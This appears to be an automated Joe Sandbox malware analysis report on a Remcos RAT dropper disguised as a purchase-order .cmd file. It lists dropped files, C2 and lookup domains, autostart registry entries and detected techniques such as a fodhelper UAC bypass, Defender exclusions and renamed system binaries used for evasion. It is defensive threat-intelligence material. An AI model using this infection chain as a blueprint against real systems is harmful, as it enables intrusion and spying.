                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432341 Sample: Purchase Order is approved2... Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 77 www.pentegrasystem.com 2->77 79 geoplugin.net 2->79 81 2 other IPs or domains 2->81 103 Snort IDS alert for network traffic 2->103 105 Found malware configuration 2->105 107 Malicious sample detected (through community Yara rule) 2->107 109 11 other signatures 2->109 10 cmd.exe 1 2->10         started        13 Kpeyvroh.PIF 2->13         started        15 Kpeyvroh.PIF 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 129 Adds a directory exclusion to Windows Defender 10->129 20 sppsvc.pif 10->20         started        25 alpha.exe 1 10->25         started        27 extrac32.exe 1 10->27         started        31 11 other processes 10->31 131 Contains functionality to bypass UAC (CMSTPLUA) 13->131 133 Detected Remcos RAT 13->133 135 Contains functionalty to change the wallpaper 13->135 137 4 other signatures 13->137 73 192.168.2.5, 138, 443, 49703 unknown unknown 17->73 75 239.255.255.250 unknown Reserved 17->75 29 chrome.exe 17->29         started        signatures6 process7 dnsIp8 83 www.pentegrasystem.com 83.137.157.85, 49730, 9231 INVITECHHU Hungary 20->83 85 drive.usercontent.google.com 142.250.217.193, 443, 49729 GOOGLEUS United States 20->85 87 geoplugin.net 178.237.33.50, 49731, 80 ATOM86-ASATOM86NL Netherlands 20->87 65 C:\Users\Public\Libraries\Kpeyvroh, data 20->65 dropped 67 C:\Users\Public\Kpeyvroh.url, MS 20->67 dropped 69 C:\ProgramData\remcos\logs.dat, data 20->69 dropped 113 Detected Remcos RAT 20->113 115 Contains functionalty to change the wallpaper 20->115 117 Contains functionality to register a low level keyboard hook 20->117 127 2 other signatures 20->127 33 extrac32.exe 20->33         started        119 Adds a directory exclusion to Windows Defender 25->119 37 xkn.exe 13 25->37         started        71 C:\Users\Public\alpha.exe, PE32+ 27->71 dropped 121 Drops PE files to the user root directory 27->121 123 Drops or copies certutil.exe with a different name (likely to bypass HIPS) 27->123 125 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 27->125 89 www.google.com 142.250.64.196, 443, 49707, 49708 GOOGLEUS United States 29->89 39 kn.exe 31->39         started        41 kn.exe 31->41         started        43 extrac32.exe 1 31->43         started        45 3 other processes 31->45 file9 signatures10 process11 file12 55 C:\Users\Public\Libraries\Kpeyvroh.PIF, PE32 33->55 dropped 91 Powershell is started from unusual location (likely to bypass HIPS) 37->91 93 Adds a directory exclusion to Windows Defender 37->93 95 Reads the Security eventlog 37->95 97 Reads the System eventlog 37->97 47 alpha.exe 1 37->47         started        50 fodhelper.exe 12 37->50         started        99 Registers a new ROOT certificate 39->99 101 Drops PE files with a suspicious file extension 39->101 57 C:\Users\Public\Libraries\sppsvc.pif, PE32 41->57 dropped 59 C:\Users\Public\kn.exe, PE32+ 43->59 dropped 61 C:\Users\Public\xkn.exe, PE32+ 45->61 dropped 63 C:\Users\Public\ger.exe, PE32+ 45->63 dropped signatures13 process14 signatures15 139 Adds a directory exclusion to Windows Defender 47->139 52 ger.exe 1 1 47->52         started        process16 signatures17 111 UAC bypass detected (Fodhelper) 52->111

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Purchase Order is approved26042024.cmd3%ReversingLabs

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\Public\alpha.exe0%ReversingLabs
                    C:\Users\Public\ger.exe0%ReversingLabs
                    C:\Users\Public\kn.exe0%ReversingLabs
                    C:\Users\Public\xkn.exe0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                    https://login.windows.local0%URL Reputationsafe
                    http://geoplugin.net/json.gp/C100%URL Reputationphishing
                    https://contoso.com/0%URL Reputationsafe
                    https://oneget.orgX0%URL Reputationsafe
                    http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%URL Reputationsafe
                    https://sectigo.com/CPS00%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://geoplugin.net/json.gp100%URL Reputationphishing
                    http://crl.m0%URL Reputationsafe
                    http://ocsp.sectigo.com0C0%URL Reputationsafe
                    https://oneget.org0%URL Reputationsafe
                    http://geoplugin.net/json.gpK0r0%Avira URL Cloudsafe
                    http://www.microsoft.co0%Avira URL Cloudsafe
                    https://%ws/%ws_%ws_%ws/service.svc/%ws0%Avira URL Cloudsafe
                    https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gpa0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gpoft0%Avira URL Cloudsafe
                    http://geoplugin.net/user0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gp2BF0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gpthority0%Avira URL Cloudsafe
                    https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop0%Avira URL Cloudsafe
                    ^www.pentegrasystem.com0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    geoplugin.net
                    		178.237.33.50
                    		truefalse
                      		unknown
                      www.google.com
                      		142.250.64.196
                      		truefalse
                        		high
                        drive.google.com
                        		192.178.50.78
                        		truefalse
                          		high
                          drive.usercontent.google.com
                          		142.250.217.193
                          		truefalse
                            		high
                            www.pentegrasystem.com
                            		83.137.157.85
                            		truetrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGNCNsLEGIjCLPFnVdLGYjtbKIHiASmHBA5O7_cfgfeKSfVG961wW18u4XGlNJfozYzsMBcrzcRwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                                		high
                                https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                  		high
                                  https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktopfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.google.com/async/newtab_promosfalse
                                    		high
                                    https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGNGNsLEGIjD9G5xmGH5ri1rv3DQ5wOXVjujAbZEINLE1ZHU1KvNcD8D04QZH5XmP2eIPYJfEfjEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                                      		high
                                      ^www.pentegrasystem.comtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://geoplugin.net/json.gptrue
                                      • URL Reputation: phishing
                                      		unknown
                                      https://www.google.com/async/ddljson?async=ntp:2false
                                        		high
                                        https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEPkn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.drfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          https://login.microsoftonline.com/%s/oauth2/authorizekn.exefalse
                                            		high
                                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://ocsp.sectigo.com0sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.microsoft.cosppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://contoso.com/Licensexkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://enterpriseregistration.windows.net/EnrollmentServer/key/kn.exefalse
                                              		high
                                              https://login.windows.localSystemSettingsAdminFlows.exe, 00000013.00000002.4501063823.000001C6008E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://geoplugin.net/json.gp/Csppsvc.pif, 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmptrue
                                              • URL Reputation: phishing
                                              		unknown
                                              https://contoso.com/xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://nuget.org/nuget.exexkn.exe, 00000009.00000002.2180228886.0000015A42F66000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2180228886.0000015A42E2F000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://oneget.orgXxkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://geoplugin.net/json.gpK0rsppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namexkn.exe, 00000009.00000002.2094439063.0000015A32DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://%ws/%ws_%ws_%ws/service.svc/%wskn.exefalse
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
                                                    		high
                                                    http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://geoplugin.net/json.gpoftsppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://nuget.org/NuGet.exexkn.exe, 00000009.00000002.2180228886.0000015A42F66000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2180228886.0000015A42E2F000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.apache.org/licenses/LICENSE-2.0xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://geoplugin.net/json.gpasppsvc.pif, 0000001C.00000003.2323628754.0000000000837000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://sectigo.com/CPS0sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://login.microsoftonline.com/%s/oauth2/tokenkn.exefalse
                                                          		high
                                                          http://geoplugin.net/json.gpthoritysppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://pesterbdd.com/images/Pester.pngxkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • URL Reputation: malware
                                                          		unknown
                                                          http://geoplugin.net/json.gp2BFsppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlxkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/Iconxkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://geoplugin.net/usersppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://github.com/Pester/Pesterxkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.mxkn.exe, 00000009.00000002.2186571233.0000015A4AE96000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatahkn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.drfalse
                                                                		high
                                                                https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svckn.exefalse
                                                                  		high
                                                                  https://aka.ms/pscore68xkn.exe, 00000009.00000002.2094439063.0000015A32DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.pmail.comKpeyvroh.PIF, Kpeyvroh.PIF, 00000024.00000002.2421237324.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2465696824.000000007FBA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://ocsp.sectigo.com0Csppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://oneget.orgxkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://drive.usercontent.google.com/6sppsvc.pif, 0000001C.00000003.3094405950.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4502894836.00000000007F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        142.250.64.196
                                                                        		www.google.comUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        83.137.157.85
                                                                        		www.pentegrasystem.comHungary
                                                                        		12301INVITECHHUtrue
                                                                        239.255.255.250
                                                                        		unknownReserved
                                                                        		unknownunknownfalse
                                                                        178.237.33.50
                                                                        		geoplugin.netNetherlands
                                                                        		8455ATOM86-ASATOM86NLfalse
                                                                        142.250.217.193
                                                                        		drive.usercontent.google.comUnited States
                                                                        		15169GOOGLEUSfalse

                                                                        Private

                                                                        IP
                                                                        192.168.2.5

                                                                        General Information

                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                        Analysis ID:1432341
                                                                        Start date and time:2024-04-26 21:55:07 +02:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 12m 28s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:38
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:1
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Purchase Order is approved26042024.cmd
                                                                        Detection:MAL
                                                                        Classification:mal100.rans.bank.troj.spyw.expl.evad.winCMD@68/35@11/6
                                                                        EGA Information:
                                                                        • Successful, ratio: 87.5%
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 58
                                                                        • Number of non-executed functions: 206
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .cmd
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 172.217.2.195, 108.177.12.84, 192.178.50.78, 34.104.35.123, 199.232.210.172, 192.229.211.108, 142.250.217.195, 142.250.189.142
                                                                        • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, cxcs.microsoft.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                        • Execution Graph export aborted for target xkn.exe, PID 5496 because it is empty
                                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                        • VT rate limit hit for: Purchase Order is approved26042024.cmd

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        21:56:02API Interceptor7x Sleep call for process: xkn.exe modified
                                                                        21:56:16API Interceptor5161076x Sleep call for process: sppsvc.pif modified
                                                                        21:56:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Kpeyvroh C:\Users\Public\Kpeyvroh.url
                                                                        21:56:35API Interceptor2x Sleep call for process: Kpeyvroh.PIF modified
                                                                        21:56:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Kpeyvroh C:\Users\Public\Kpeyvroh.url

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        239.255.255.250https://messageis.ru/pre/profile/messageGet hashmaliciousHTMLPhisherBrowse
                                                                          https://herofargwsmnncmwsrcnmwsncmwscnm.popsy.site/Get hashmaliciousHTMLPhisherBrowse
                                                                            MSG.docxGet hashmaliciousUnknownBrowse
                                                                              http://trailersalesandparts.caGet hashmaliciousUnknownBrowse
                                                                                MSG.docxGet hashmaliciousUnknownBrowse
                                                                                  https://open.camscanner.com/doc/download_file?platform=web&type=118&sid=8c5645d2944c4b262e3b5813d266f0d5&title=ProjectUpdate-XGet hashmaliciousHTMLPhisherBrowse
                                                                                    https://doc-42.jimdosite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                      https://live.easygenerator.com/review/course/3850bd4a-58ae-47b2-bb6f-157e213d949f/Get hashmaliciousUnknownBrowse
                                                                                        https://webcompanion.com/nano_download.php?Get hashmaliciousUnknownBrowse
                                                                                          https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MTQxMDYyLCJtZXNzYWdlX2lkIjoiMGd5MHB6amd2a3hmeTlnN24wNzkzdzQ3IzIzYWUwMmFhLWVjMDQtNGYwMy1iODk3LWM4NjMyYzU3ZDIxMyIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1Njc3MDYyLCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtbWVzc2FuZ2VyLnJkb2NtZ2xvYmFsLmNvbS9kb2NzL2luZGV4LnBocD9tYWlsPSUyMHNlYW4uZnVlbGxoYXJ0QGJhbmthdGNpdHkuY29tJnBhdGhzPWFib3ZlJmxpbms9RmF4X091dGxvb2siLCJpbmRpdmlkdWFsX2lkIjoiNDBmMjcwMDVjM2U0ZWRkMzE4MTUyNDIxMWMwZmNiZDYifQ.HuxvS7w7UGVjl7M8LBH9yLcIGAIbx_lymrlb7oZbnQ4Get hashmaliciousCaptcha PhishBrowse
                                                                                            178.237.33.50PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            SHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            lmg1_Mlakaifa443456.vbsGet hashmaliciousAsyncRAT, DcRat, RemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            UrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • geoplugin.net/json.gp

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            drive.google.comSwift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 142.250.101.138
                                                                                            Zapytanie ofertowe Fl#U00e4ktGroup 04232024.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 142.250.101.102
                                                                                            Umulighed.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 142.251.2.101
                                                                                            URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 142.250.101.102
                                                                                            DAIKIN AC SPAIN 2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 142.250.101.102
                                                                                            transferencia.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 142.251.2.139
                                                                                            1000901 LIQUIDACION.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 142.250.101.100
                                                                                            Zapytanie ofertowe (7427-23 ROCKFIN).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 142.251.2.139
                                                                                            Factura240413227178.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 142.250.101.102
                                                                                            JUSTIFICANTE DE PAGO.vbsGet hashmaliciousUnknownBrowse
                                                                                            • 142.250.101.138
                                                                                            geoplugin.netPURCHASEORDERSHEET&SPECIFICATIONSDOC.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
